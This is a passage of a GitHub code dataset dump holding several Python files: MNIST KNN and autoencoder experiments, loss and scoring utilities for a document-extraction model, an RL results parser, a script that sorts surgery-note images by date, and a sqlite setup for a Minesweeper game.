in list(prediction)])))\n # for i in subject_3:\n # prediction = model.predict(np.array(i))\n # print(\"\".join([inv_map[j] for j in list(prediction)]))\n # # print(spell.correction(\"\".join([inv_map[j] for j in list(model.predict(np.array(i)))])))\n # print(spell.candidates(\"\".join([inv_map[j] for j in list(prediction)])))\n\n\ndef check_words(subject):\n from spellchecker import SpellChecker\n\n spell = SpellChecker()\n\n for correct, prediction in subject.items():\n print(f\"{correct} - {prediction}\")\n before = 0\n\n for i, l in enumerate(prediction):\n if l == correct[i]:\n before += 1\n candidates = spell.candidates(prediction)\n after = 0\n if candidates:\n for word in candidates:\n if len(word) == len(prediction):\n # print(f\"Changing {prediction} to {word.upper()}\")\n prediction = word.upper()\n break\n\n for i, l in enumerate(prediction):\n if l == correct[i]:\n after += 1\n print(f\"{len(correct)} - {before} - {after} - {candidates}\")\n\n\nmain()\n","repo_name":"brucebeck95/Masters","sub_path":"full_process.py","file_name":"full_process.py","file_ext":"py","file_size_in_byte":13612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28619150573","text":"import numpy as np\nimport struct\nfrom array import array\nfrom os.path import join\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import decomposition\nfrom scipy.spatial import Voronoi, voronoi_plot_2d\nimport torch\nfrom torch.autograd import grad\nimport torch.nn.functional as F\nimport matplotlib.patches as p\n\n# Setting up the path for the data files\nin_path = './archive'\ntrain_images = join(in_path, 'train-images-idx3-ubyte/train-images-idx3-ubyte')\ntrain_labels = join(in_path, 'train-labels-idx1-ubyte/train-labels-idx1-ubyte')\ntest_images = join(in_path, 't10k-images-idx3-ubyte/t10k-images-idx3-ubyte')\ntest_labels = join(in_path, 't10k-labels-idx1-ubyte/t10k-labels-idx1-ubyte')\n\n# Defining a class for loading and processing the MNIST dataset\nclass MnistDataloader(object):\n def __init__(self, training_images, training_labels, test_images, test_labels):\n self.training_images = training_images\n self.training_labels = training_labels\n self.test_images = test_images\n self.test_labels = test_labels\n \n def read_images_labels(self, images_filepath, labels_filepath): \n # Read and process label data\n labels = []\n with open(labels_filepath, 'rb') as file:\n magic, size = struct.unpack(\">II\", file.read(8))\n labels = array(\"B\", file.read())\n # Read and process image data \n with open(images_filepath, 'rb') as file:\n magic, size, rows, cols = struct.unpack(\">IIII\", file.read(16))\n image_data = array(\"B\", file.read()) \n images = []\n for i in range(size):\n images.append([0] * rows * cols)\n for i in range(size):\n img = np.array(image_data[i * rows * cols:(i + 1) * rows * cols])\n img = img.reshape(28, 28)\n images[i][:] = img\n \n return images, labels\n\n def load_data(self):\n # Load training and testing data\n x_train, y_train = self.read_images_labels(self.training_images, self.training_labels)\n x_test, y_test = self.read_images_labels(self.test_images, self.test_labels)\n return (x_train, y_train),(x_test, y_test)\n\n# Defining a class for the Autoencoder model\nclass AutoEncoder():\n def __init__(self, dims, activation_list=None):\n self.layers = len(dims)-1\n self.params = {}\n\n # Initializing weights and biases\n for l in range(self.layers):\n self.params[\"W\"+str(l+1)] = 0.01*torch.randn(dims[l], dims[l+1], requires_grad=True, dtype=torch.float32)\n self.params[\"b\"+str(l+1)] = torch.zeros((dims[l+1], 1), requires_grad=True, dtype=torch.float32)\n\n def forward(self, x):\n # Forward pass through the network layers\n x = torch.mm(self.params[\"W1\"].T, x.T) + self.params[\"b1\"]\n x = relu(x)\n x = torch.mm(self.params[\"W2\"].T, x) + self.params[\"b2\"]\n x = relu(x)\n x = torch.mm(self.params[\"W3\"].T, x) + self.params[\"b3\"]\n x = relu(x)\n x = torch.mm(self.params[\"W4\"].T, x) + self.params[\"b4\"]\n x = relu(x)\n x = torch.mm(self.params[\"W5\"].T, x) + self.params[\"b5\"]\n x = relu(x)\n x = torch.mm(self.params[\"W6\"].T, x) + self.params[\"b6\"]\n return x\n\n def test(self, x):\n # Test pass through a subset of network layers\n x = torch.mm(self.params[\"W1\"].T, x.T) + self.params[\"b1\"]\n x = relu(x)\n x = torch.mm(self.params[\"W2\"].T, x) + self.params[\"b2\"]\n x = relu(x)\n x = torch.mm(self.params[\"W3\"].T, x) + self.params[\"b3\"]\n return x\n\n# Defining the ReLU activation function\ndef relu(z):\n A = torch.clamp(z, min=0.0, max=float('inf'))\n return A\n\n# Function for training the model\ndef train(model, x, labels, epochs=20, l_rate=0.1, seed=1):\n cost = []\n torch.manual_seed(seed)\n\n for i in range(epochs):\n logits = model.forward(x)\n\n # Computing the loss and recording it\n loss = F.cross_entropy(logits.transpose(0, 1), labels.long()) # using Mean Squared Error (MSE) loss might not be suitable\n cost.append(loss.detach())\n\n # Logging loss every 5 epochs\n if not i % 5 == 0: # adjusted to every 5\n print('epoch: %02d | Loss: %.5f' % ((i + 1), loss.item()))\n\n # Calculating gradients and updating parameters(changed for code efficiency)\n gradients = grad(loss, list(model.params.values()), create_graph=True)\n with torch.no_grad():\n for j, param in enumerate(model.params.values()):\n param -= l_rate * gradients[j]\n return cost\n\n# Function to calculate the sum of diagonal elements in a confusion matrix\ndef getSum(cm):\n sum = 0\n for i in range(10):\n sum += cm[i][i]\n return sum\n\n# Function to split data into Voronoi cells\ndef voronoi_split(x, y):\n out = [[0, 0] for i in range(10)]\n count = [0 for i in range(10)]\n # Aggregating coordinates for each label\n for i in range(len(y)):\n out[y[i]][0] += x[y[i]][0]\n out[y[i]][1] += x[y[i]][1]\n count[y[i]] += 1\n # Averaging coordinates for each label\n for i in range(10):\n out[i][0] /= count[i]\n out[i][1] /= count[i]\n\n return out\n\n########## Begin Main Script ##########\n# Loading the MNIST dataset\nmndl = MnistDataloader(train_images, train_labels, test_images, test_labels)\n(x_train, y_train), (x_test, y_test) = mndl.load_data()\n\n# Preprocessing the dataset\nx_train = np.array(x_train)\ny_train = np.array(y_train)\nx_test = np.array(x_test)\ny_test = np.array(y_test)\n\nx_train = x_train.reshape(60000, 784)\nx_test = x_test.reshape(10000, 784)\n\n# Training and evaluating a K-Nearest Neighbors Classifier\nknn = KNeighborsClassifier(n_neighbors=10) # tried lower values for n_neighbors\nknn.fit(x_train, y_train)\n\n# Predicting and evaluating the KNN model\npred_y = knn.predict(x_test)\ncm = confusion_matrix(y_test, pred_y)\ns = getSum(cm)\nprint(\"Accuracy: \", s/10000)\n\n# Visualizing the confusion matrix\nplt.imshow(cm, cmap = 'inferno', interpolation='nearest')\nplt.xlabel('preds')\nplt.ylabel('vals')\nplt.show()\nplt.clf()\n\n# Exploring different dimensions for PCA\ndimensions = [1, 10, 20, 50, 100]\npca = decomposition.PCA()\npca.n_components = 2\npca_transform = pca.fit_transform(x_test)\npca_train = pca.fit_transform(x_train)\nplot = voronoi_split(pca_train, y_train)\nv = Voronoi(plot)\nfig = voronoi_plot_2d(v)\n\n# Visualizing data points in PCA-transformed space\npoint_list = [[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], []]\nc_list = ['red', 'orange', 'yellow', 'green', 'blue', 'purple', 'pink', 'olive', 'black', 'cyan']\nfor i in range(0, len(y_test), 10):\n point_list[2*y_test[i]].append(pca_transform[i][0])\n point_list[2*y_test[i]+1].append(pca_transform[i][1])\n\nfor i in range(0, 10):\n plt.scatter(point_list[2*i], point_list[2*i+1], color=c_list[i], label=i)\n\nplt.legend()\nplt.show()\nplt.clf()\n\n# Repeating KNN classification with different PCA dimensions\npca.n_components = 2\npca_transform = pca.fit_transform(x_train)\npca_test = pca.fit_transform(x_test)\n\n# Looping through different dimensions for KNN classification\nfor i in range(len(dimensions)):\n knn = KNeighborsClassifier(n_neighbors=dimensions[i])\n knn.fit(pca_transform, y_train)\n pred_y = knn.predict(pca_test)\n cm = confusion_matrix(y_test, pred_y)\n s = getSum(cm)\n print(\"Accuracy[\", dimensions[i],\"]: \", s/10000)\n\n # Plotting and displaying the confusion matrix\n plt.imshow(cm, cmap = 'inferno', interpolation='nearest')\n plt.xlabel('preds')\n plt.ylabel('vals')\n plt.show()\n plt.clf()\n\n# Converting datasets to tensors for PyTorch \ny_aux = y_train\nx_train = torch.tensor(x_train, dtype=torch.float32)\ny_train = torch.tensor(y_train, dtype=torch.float32)\nx_test = torch.tensor(x_test, dtype=torch.float32)\ny_test = torch.tensor(y_test, dtype=torch.float32)\n\n# Setting seed and training parameters for the AutoEncoder\nseed = 1\ntorch.manual_seed(seed)\nepochs = 500\nl_rate = 0.05\n\n# Dimensions for the AutoEncoder layers\ndims = [784, 300, 100, 2, 100, 300, 10] # output layer with dimmension of 10\n\n# Initializing AutoEncoder model\nmodel = AutoEncoder(dims)\ncost = train(model, x_train, y_train)\n\n# Testing the AutoEncoder model and converting outputs to numpy arrays\nae_dataset_test = model.test(x_test).detach().numpy()\nae_dataset_train = model.test(x_train).detach().numpy()\n\n# Creating Voronoi plots for the AutoEncoder's output\nplot = voronoi_split(ae_dataset_train.T, y_aux)\nv = Voronoi(plot)\nv = voronoi_plot_2d(v)\n\n# Preparing data for scatter plot\npoint_list = [[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], []]\nc_list = ['red', 'orange', 'yellow', 'green', 'blue', 'purple', 'pink', 'olive', 'black', 'cyan']\n\n# Plotting each point in the AutoEncoder's test dataset\nfor i in range(0, len(y_test), 10):\n point_list[2*y_aux[i]].append(ae_dataset_test[0][i])\n point_list[2*y_aux[i]+1].append(ae_dataset_test[1][i])\n\n# Scatter plot of the AutoEncoder's output\nfor i in range(0, 10):\n plt.scatter(point_list[2*i], point_list[2*i+1], color=c_list[i], label=i)\n\nplt.legend()\nplt.show()\nplt.clf()\n\n# Repeating KNN classification with AutoEncoder output\nfor i in range(len(dimensions)):\n knn = KNeighborsClassifier(n_neighbors=dimensions[i])\n knn.fit(ae_dataset_train.T, y_train)\n pred_y = knn.predict(ae_dataset_test.T)\n\n cm = confusion_matrix(y_test, pred_y)\n s = getSum(cm)\n print(\"Accuracy[\", dimensions[i],\"]: \", s/10000)\n\n # Plotting and displaying the confusion matrix\n plt.imshow(cm, cmap = 'inferno', interpolation='nearest')\n plt.xlabel('preds')\n plt.ylabel('vals')\n plt.show()\n plt.clf()\n","repo_name":"tSigler2/machineLearningProject","sub_path":"knn_MNIST.py","file_name":"knn_MNIST.py","file_ext":"py","file_size_in_byte":9803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8833243016","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport typing\nfrom gensim.models import Word2Vec\nimport csv\nfrom tools.cutie.preprocessing import convert_json_to_tensors\n\nclass FocalTverskyLoss(nn.Module):\n \"\"\"\n Pytorch implementation of the FocalTversky Loss function\n \"\"\"\n def __init__(self, smooth=1, alpha=0.5, beta=0.5, gamma=1):\n super(FocalTverskyLoss, self).__init__()\n self.smooth = smooth\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n def forward(self, inputs, targets):\n \n #comment out if your model contains a sigmoid or equivalent activation layer\n #inputs = F.sigmoid(inputs) \n \n #flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n \n #True Positives, False Positives & False Negatives\n TP = (inputs * targets).sum() \n FP = ((1-targets) * inputs).sum()\n FN = (targets * (1-inputs)).sum()\n \n Tversky = (TP + self.smooth) / (TP + self.alpha*FP + self.beta*FN + self.smooth) \n FocalTversky = (1 - Tversky)**self.gamma\n \n return FocalTversky\n\nclass TverskyLoss(nn.Module):\n \"\"\"\n Pytorch implementation of the Tversky Loss function\n \"\"\"\n def __init__(self, smooth=1, alpha=0.5, beta=0.5):\n super(TverskyLoss, self).__init__()\n self.smooth = smooth\n self.alpha = alpha\n self.beta = beta\n\n def forward(self, inputs, targets):\n \n #comment out if your model contains a sigmoid or equivalent activation layer\n #inputs = F.sigmoid(inputs) \n \n #flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n \n #True Positives, False Positives & False Negatives\n TP = (inputs * targets).sum() \n FP = ((1-targets) * inputs).sum()\n FN = (targets * (1-inputs)).sum()\n \n Tversky = (TP + self.smoothth) / (TP + self.alpha*FP + self.beta*FN + self.smooth) \n \n return 1 - Tversky\n\nclass FocalLoss(nn.Module):\n \"\"\"\n Pytorch implementation of the Focal Loss function\n \"\"\"\n def __init__(self, alpha=0.8, gamma=2):\n super(FocalLoss, self).__init__()\n self.alpha = alpha\n self.gamma = gamma\n\n def forward(self, inputs, targets):\n \n #comment out if your model contains a sigmoid or equivalent activation layer\n #inputs = F.sigmoid(inputs) \n \n #flatten label and prediction tensors\n inputs = inputs.view(-1)\n targets = targets.view(-1)\n \n #first compute binary cross-entropy \n BCE = F.binary_cross_entropy(inputs, targets, reduction='mean')\n BCE_EXP = torch.exp(-BCE)\n focal_loss = self.alpha * (1-BCE_EXP)**self.gamma * BCE\n \n return focal_loss\n\nclass CutieDataset(torch.utils.data.Dataset):\n \"\"\"\n Dataset class for cutie model training\n \"\"\"\n def __init__(self, root, embedding_fun: typing.Callable, grid_size: int = 64, embedding_size: int = 128, N_class: int = 5):\n self.root = root\n self.files = [os.path.join(root,file) for file in os.listdir(root) if file.endswith('.json')]\n self.embedding = embedding_fun\n self.grid_size = grid_size\n self.embedding_size = embedding_size\n self.N_class = N_class\n\n def __getitem__(self, index):\n \n grid_tensor, classes_tensor = convert_json_to_tensors(self.files[index], embedding_fun = self.embedding, grid_size = self.grid_size, embedding_size = self.embedding_size, N_class = self.N_class)\n \n return grid_tensor, classes_tensor\n \n def __len__(self):\n return len(self.files)\n\nclass word2vec_embedding():\n \"\"\"\n Word2vec embedding class for cutie model training experimentation\n \"\"\"\n def __init__(self, vocab, embedding_size):\n self.vocab = vocab\n self.embedding_size = embedding_size\n def embed(self, text):\n w2v = Word2Vec(sentences=self.vocab, vector_size=self.embedding_size, window=3, min_count=1, workers=4)\n if text not in w2v.wv.key_to_index.keys():\n w2v.build_vocab([[text]], update=True)\n w2v.train([[text]], total_examples=1, epochs =2)\n vector = torch.tensor(w2v.wv[text])\n return vector\n\ndef init_stats(N_class: int) -> dict:\n \"\"\"\n Initialize a dictionary to store cutie model training or validation statistics\n \n :param N_class: Number of classes to predict\n :type N_class: int\n :return: dictionary to store the statistics\n :rtype: dict\n \"\"\"\n stats = {'TP':{},'TN':{},'FP':{},'FN':{},'softAP':{},'AP':{},'running_loss':0}\n for class_id in range(N_class):\n for key in stats.keys():\n if key != 'running_loss':\n stats[key][class_id] = 0\n return stats\n\ndef init_scores(N_class: int) -> dict:\n \"\"\"\n Initialize a dictionary to store cutie model training or validation scores\n \n :param N_class: Number of classes to predict\n :type N_class: int\n :return: dictionary to store the scores\n :rtype: dict\n \"\"\"\n scores = {'Acc':{},'Prec':{},'Rec':{},'F1':{},'softAP':{},'AP':{},'loss':0}\n for class_id in range(N_class):\n for key in scores.keys():\n if key != 'loss':\n scores[key][class_id] = 0\n return scores\n\ndef save_stats(stats: dict, N_class: int, output: torch.tensor, target: torch.tensor, loss: torch.tensor):\n \"\"\"\n Calculates and saves the statistics after each batch during cutie training or validation.\n \n :param stats: Dictionnary storing the training or validation statistics\n :type stats: dict\n :param N_class: Number of classes to predict\n :type N_class: int\n :param output: output predictions of the model\n :type output: torch.tensor\n :param target: Ground truth classes\n :type target: torch.tensor\n :param loss: Loss calculated on the current batch\n :type loss: torch.tensor\n \"\"\"\n with torch.no_grad():\n for class_id in range(N_class):\n TP_tensor = ((output.data.max(1)[1] == class_id) * target[:,class_id,:])\n TN_tensor = ((output.data.max(1)[1] != class_id) * (1-target[:,class_id,:]))\n FP_tensor = ((output.data.max(1)[1] == class_id) * (1-target[:,class_id,:]))\n FN_tensor = ((output.data.max(1)[1] != class_id) * target[:,class_id,:])\n stats['TP'][class_id] += torch.sum(TP_tensor).item() \n stats['TN'][class_id] += torch.sum(TN_tensor).item()\n stats['FP'][class_id] += torch.sum(FP_tensor).item()\n stats['FN'][class_id] += torch.sum(FN_tensor).item()\n stats['softAP'][class_id] += torch.sum(torch.sum(FN_tensor,dim=1) == 0).item()\n stats['AP'][class_id] += torch.sum((torch.sum(FN_tensor,dim=1) == 0) * (torch.sum(FP_tensor,dim=1) == 0)).item()\n stats['running_loss'] += loss.item()\n\ndef save_scores(scores: dict, stats: dict, dataloader :typing.Callable, N_class: int):\n \"\"\"\n Calculates and saves the scores after each epoch during cutie training\n \n :param scores: Dictionnary storing the training or validation scores\n :type scores: dict\n :param stats: Dictionnary storing the training or validation statistics\n :type stats: dict\n :param dataloader: Dataloader function used to train or validate the model\n :type dataloader: torch.tensor\n :param N_class: Number of classes to predict\n :type N_class: int\n \"\"\"\n with torch.no_grad():\n for class_id in range(N_class):\n TN = stats['TN'][class_id]\n TP = stats['TP'][class_id]\n FN = stats['FN'][class_id]\n FP = stats['FP'][class_id]\n scores['softAP'][class_id] = stats['softAP'][class_id] / (dataloader.batch_size * len(dataloader))\n scores['softAP'][class_id] = round(scores['softAP'][class_id],3)\n scores['AP'][class_id] = stats['AP'][class_id] / (dataloader.batch_size * len(dataloader))\n scores['AP'][class_id] = round(scores['AP'][class_id],3)\n if (TN + TP + FN + FP) != 0:\n scores['Acc'][class_id] = round((TN + TP) / (TN + TP + FN + FP),3)\n else:\n scores['Acc'][class_id] = 0\n if (TP + FP) != 0:\n scores['Prec'][class_id] = round(TP / (TP + FP),3)\n else:\n scores['Prec'][class_id] = 0\n if (TP + FN) != 0:\n scores['Rec'][class_id] = round(TP / (TP + FN),3)\n else:\n scores['Rec'][class_id] = 0\n if (scores['Prec'][class_id] + scores['Rec'][class_id]) != 0:\n scores['F1'][class_id] = 2 * (scores['Prec'][class_id] * scores['Rec'][class_id]) / (scores['Prec'][class_id] + scores['Rec'][class_id])\n scores['F1'][class_id] = round(scores['F1'][class_id],3) \n else:\n scores['F1'][class_id] = 0\n scores['loss'] = round(stats['running_loss'] / len(dataloader),5)\n\ndef write_scores(scores: dict, epoch: int, N_class: int, file_path: str):\n \"\"\"\n Append the scores to a csv file after each epoch during cutie training\n \n :param scores: Dictionnary storing the training or validation scores\n :type scores: dict\n :param epoch: Current epoch of the training\n :type epoch: int\n :param N_class: Number of classes to predict\n :type N_class: int\n :param file_path: Path to the output file\n :type file_path: str\n \"\"\"\n if not os.path.isfile(file_path):\n open(file_path,'w').close()\n \n filesize = os.path.getsize(file_path)\n if filesize == 0:\n headers = ['epoch','loss']\n for topic in ['AP','softAP','Acc','Prec','Rec','F1']:\n for class_id in range(N_class):\n headers.append(f'{topic}_{class_id}')\n with open(file_path, 'w',newline='') as outfile:\n writer = csv.writer(outfile, delimiter='|')\n writer.writerow(headers)\n \n new_line = [epoch,scores[\"loss\"]]\n for topic in ['AP','softAP','Acc','Prec','Rec','F1']:\n for class_id in range(N_class):\n new_line.append(scores[topic][class_id])\n with open(file_path, 'a',newline='') as outfile:\n writer = csv.writer(outfile, delimiter='|')\n writer.writerow(new_line)\n\n\n\n\n","repo_name":"assansanogo/Opteeq","sub_path":"cutie/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1688264073","text":"import csv\nimport statistics\n\nos_FILE = \"../RL/res/Base_Result_-os.csv\"\no3_FILE = \"../RL/res/Base_Result_-o3.csv\"\nRESULT_FILE_LIST = [\n \"../RL/res/RL_Result_PPO_os.csv\",\n \"../RL/res/RL_Cluster_Result_PPO_os.csv\",\n \"../RL/res/RL_Result_A3C_os.csv\",\n \"../RL/res/RL_Cluster_Result_A3C_os.csv\",\n \"../RL/res/RL_Result_PG_os.csv\",\n \"../RL/res/RL_Cluster_Result_PG_os.csv\",\n \"../RL/res/RL_Result_PPO_PG_A3C_os.csv\",\n \"../RL/res/RL_Cluster_Result_PPO_PG_A3C_os.csv\",\n]\n\nraw_total_memory_list = []\nraw_total_time_list = []\n\nos_total_memory_list = []\nos_memory_reduction_list = []\nos_total_time_list = []\nos_time_reduction_list = []\n\nmemory_percent_result = []\nmemory_value_result = []\ntime_percent_result = []\ntime_value_result = []\nwith open(os_FILE, newline='') as f:\n reader = csv.reader(f)\n base_data = list(reader)\n del base_data[0]\n base_data = [list(map(float, lst)) for lst in base_data]\n\n for item in base_data:\n os_total_memory_list.append(int(item[0]))\n os_memory_reduction_list.append(int(item[1]))\n os_total_time_list.append(item[2])\n os_time_reduction_list.append(item[3])\n raw_total_memory_list.append(int(item[4]))\n raw_total_time_list.append(item[5])\n\n base_memory_reduction_percent_list = []\n for idx in range(len(os_memory_reduction_list)):\n diff = (os_memory_reduction_list[idx] / raw_total_memory_list[idx]) * 100\n base_memory_reduction_percent_list.append(diff)\n base_time_reduction_percent_list = []\n for idx in range(len(os_time_reduction_list)):\n diff = (os_time_reduction_list[idx] / raw_total_time_list[idx]) * 100\n base_time_reduction_percent_list.append(diff)\n\nmemory_percent_result.append(base_memory_reduction_percent_list)\nmemory_value_result.append(os_memory_reduction_list)\ntime_percent_result.append(base_time_reduction_percent_list)\ntime_value_result.append(os_total_time_list)\n\no3_total_memory_list = []\no3_memory_reduction_list = []\no3_total_time_list = []\no3_time_reduction_list = []\n\nwith open(o3_FILE, newline='') as f:\n reader = csv.reader(f)\n base_data = list(reader)\n del base_data[0]\n base_data = [list(map(float, lst)) for lst in base_data]\n\n for item in base_data:\n o3_total_memory_list.append(int(item[0]))\n o3_memory_reduction_list.append(int(item[1]))\n o3_total_time_list.append(item[2])\n o3_time_reduction_list.append(item[3])\n\nfor result_file in RESULT_FILE_LIST:\n print(\"Processing \", result_file)\n with open(result_file, newline='') as f:\n reader = csv.reader(f)\n data = list(reader)\n del data[0]\n data = [list(map(float, lst)) for lst in data]\n\n memory_reduction_list = []\n for idx in range(len(data)):\n memory_value = int(-data[idx][0]/100)+os_total_memory_list[idx]\n diff = -(memory_value-raw_total_memory_list[idx])\n memory_reduction_list.append(diff)\n memory_reduction_precent_list = []\n for idx in range(len(memory_reduction_list)):\n diff = (memory_reduction_list[idx] / raw_total_memory_list[idx]) * 100\n memory_reduction_precent_list.append(diff)\n memory_percent_result.append(memory_reduction_precent_list)\n memory_value_result.append(memory_reduction_list)\n\n time_reduction_list = []\n time_list = []\n for idx in range(len(data)):\n time_value = data[idx][2]*os_total_time_list[idx]/100+os_total_time_list[idx]\n diff = -(time_value-raw_total_time_list[idx])\n time_reduction_list.append(diff)\n time_list.append(time_value)\n time_reduction_percent_list = []\n for idx in range(len(time_reduction_list)):\n diff = (time_reduction_list[idx] / raw_total_time_list[idx]) * 100\n time_reduction_percent_list.append(diff)\n time_percent_result.append(time_reduction_percent_list)\n time_value_result.append(time_list)\n \nprint(\"\\nMemory Average\")\nmemory_average_percent = list(map(statistics.mean, memory_percent_result))\nmemory_average_value = list(map(statistics.mean, memory_value_result))\nprint(\"-os Memory reduced (byte)\", memory_average_value[0])\nfor idx in range(1, len(memory_average_percent)):\n print(RESULT_FILE_LIST[idx-1].split('/')[3], \"Memory reduced (byte)\", memory_average_value[idx])\n print(RESULT_FILE_LIST[idx-1].split('/')[3], \"Improve compare to -os: \", \n round((memory_average_value[idx]-memory_average_value[0])/memory_average_value[0]*100, 3), \"%\")\n\nprint(\"\\nTime Average\")\ntime_average_percent = list(map(statistics.mean, time_percent_result))\ntime_average_value = list(map(statistics.mean, time_value_result))\nprint(\"-os Time (ms)\", time_average_value[0]*1000)\nfor idx in range(1, len(time_average_percent)):\n print(RESULT_FILE_LIST[idx-1].split('/')[3], \"Time (ms)\", time_average_value[idx]*1000)\n print(RESULT_FILE_LIST[idx-1].split('/')[3], \"Improve compare to -os: \", \n round((time_average_value[idx]-time_average_value[0])/time_average_value[0]*100, 3), \"%\")\n\nmemory_percent_result = list(map(list, zip(*memory_percent_result)))\nwith open(\"./Memory_Result.csv\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerow([os_FILE] + RESULT_FILE_LIST)\n for idx in range(1, len(memory_percent_result)):\n writer.writerow(memory_percent_result[idx])","repo_name":"jschang0215/RL-TransformPass-Optimization","sub_path":"Experiment_Result/Parse_Data.py","file_name":"Parse_Data.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23966655630","text":"import pandas as pd\nimport os\nimport re\nimport datetime\nimport shutil\nfrom fuzzywuzzy import process\nimport datetime\nimport dateparser\n\ndef create_date_dir_move_file(source_path, destination_path, suffix, start_dt):\n files = os.listdir(source_path)\n for file in files:\n if file.endswith(suffix):\n match = re.search('\\d{4}-\\d{2}-\\d{2}', file)\n dt = datetime.datetime.strptime(match.group(), '%Y-%m-%d').date()\n start_date = datetime.datetime.strptime(start_dt, '%Y-%m-%d').date()\n if dt > start_date:\n dt_path = os.path.join(destination_path, str(dt))\n if not os.path.isdir(dt_path):\n os.mkdir(dt_path)\n if not os.path.isfile(os.path.join(dt_path, file)):\n shutil.move(os.path.join(source_path, file), dt_path)\n\nsource_path = 'D:/Shweta/ot_notes/2022_02_21_ot/2022_02_21_all'\ndestination_path = 'D:/Shweta/ot_notes/2022_02_21_ot/2022_02_21_datewise'\n\ncreate_date_dir_move_file(source_path, destination_path, suffix = '.jpg', start_dt = '2021-08-02')\n\n##\ndef find_date(sx_df, dt_str = 'Sx Date'):\n dts = []\n for sx_dt in sx_df[dt_str]:\n match = re.search('\\d{4}-\\d{2}-\\d{2}', str(sx_dt))\n if match is not None:\n dt = datetime.datetime.strptime(match.group(), '%Y-%m-%d').date()\n dts.append(str(dt))\n else:\n dts.append(sx_dt)\n return dts\n\ndef convert_all_dates_into_one_format(dates):\n dts = []\n for date in dates:\n dt_find = dateparser.parse(str(date))\n match = re.search('\\d{4}-\\d{2}-\\d{2}', str(dt_find))\n if match is not None:\n dts.append(match[0])\n else:\n dts.append(date)\n return dts\n\ndef match_the_dates(path, sx_df, sx_images_dts, dt_str = 'Sx Date', sx_name_str = 'Name '):\n sx_dates = find_date(sx_df, dt_str)\n all_dates = convert_all_dates_into_one_format(sx_dates)\n sx_df['cleaned_sx_dates'] = all_dates\n for sx_image_dt in sx_images_dts:\n matched_dates = process.extractBests(query=sx_image_dt, choices=all_dates, score_cutoff=100)\n print(matched_dates)\n if matched_dates is not None:\n dt_gr = sx_df.groupby('cleaned_sx_dates')\n if len(matched_dates) == 1:\n matched_dt_gr = dt_gr.get_group(matched_dates[0][0])\n names = matched_dt_gr[sx_name_str]\n new_name = sx_image_dt + '_' + names.iloc[0]\n source = os.path.join(path, sx_image_dt)\n destination = os.path.join(path, new_name)\n os.rename(source, destination)\n if len(matched_dates) == 2:\n matched_dt_gr = dt_gr.get_group(matched_dates[0][0])\n names = matched_dt_gr[sx_name_str]\n new_name = sx_image_dt + '_' + names.iloc[0] + '_' + names.iloc[1]\n source = os.path.join(path, sx_image_dt)\n destination = os.path.join(path, new_name)\n os.rename(source, destination)\n if len(matched_dates) == 3:\n matched_dt_gr = dt_gr.get_group(matched_dates[0][0])\n names = matched_dt_gr[sx_name_str]\n new_name = sx_image_dt + '_' + names.iloc[0] + '_' + names.iloc[1] + '_' + names.iloc[2]\n source = os.path.join(path, sx_image_dt)\n destination = os.path.join(path, new_name)\n os.rename(source, destination)\n if len(matched_dates) == 4:\n matched_dt_gr = dt_gr.get_group(matched_dates[0][0])\n names = matched_dt_gr[sx_name_str]\n new_name = sx_image_dt + '_' + names.iloc[0] + '_' + names.iloc[1] + '_' + names.iloc[2] + '_' + names.iloc[3]\n source = os.path.join(path, sx_image_dt)\n destination = os.path.join(path, new_name)\n os.rename(source, destination)\n\nsx_images_dts = os.listdir(destination_path)\nsx_df = pd.read_excel('D:\\\\Shweta\\\\Surgery\\\\2022_02_22_surgery_master_list_sk.xlsx')\nmatch_the_dates(destination_path, sx_df, sx_images_dts, dt_str = 'surgery_date', sx_name_str = 'patient_name')\n\n## classifing the ot data by patient names and adding the file_number into the folder\n\nfolder_path = 'D:/Shweta/ot_notes/all_ot_notes'\n\n\n","repo_name":"shwetakadupccm/file_management","sub_path":"ot_forms_management.py","file_name":"ot_forms_management.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7535255994","text":"from db_connection import get_database_connection\n\n\ndef drop_tables(connection):\n \"\"\"drops all tables\n\n Args:\n connection (sqlite3.Connection): connection to .db file\n \"\"\"\n cursor = connection.cursor()\n\n cursor.execute(\"DROP TABLE IF EXISTS _8x8;\")\n cursor.execute(\"DROP TABLE IF EXISTS _16x16;\")\n cursor.execute(\"DROP TABLE IF EXISTS _24x16;\")\n\n connection.commit()\n\n\ndef create_tables(connection):\n \"\"\"creates tables\n\n Args:\n connection (sqlite3.Connection): connection to .db file\n \"\"\"\n\n cursor = connection.cursor()\n\n cursor.execute(\n \"CREATE TABLE _8x8 (id integer PRIMARY KEY, name TEXT, time FLOAT);\")\n cursor.execute(\n \"CREATE TABLE _16x16 (id integer PRIMARY KEY, name TEXT, time FLOAT);\")\n cursor.execute(\n \"CREATE TABLE _24x16 (id integer PRIMARY KEY, name TEXT, time FLOAT);\")\n\n connection.commit()\n\n\ndef initialize_database():\n \"\"\"gets database connection or makes the file, clears it, and then creates tables\n \"\"\"\n connection = get_database_connection()\n\n drop_tables(connection)\n create_tables(connection)\n","repo_name":"thefakejj/Minesweeper","sub_path":"src/initialize_database.py","file_name":"initialize_database.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23970187600","text":"import helper_function.ask_y_n_statement as ask\nimport sql.add_update_sql as sql\nimport helper_function.pccm_names as names\nimport pandas as pd\nfrom 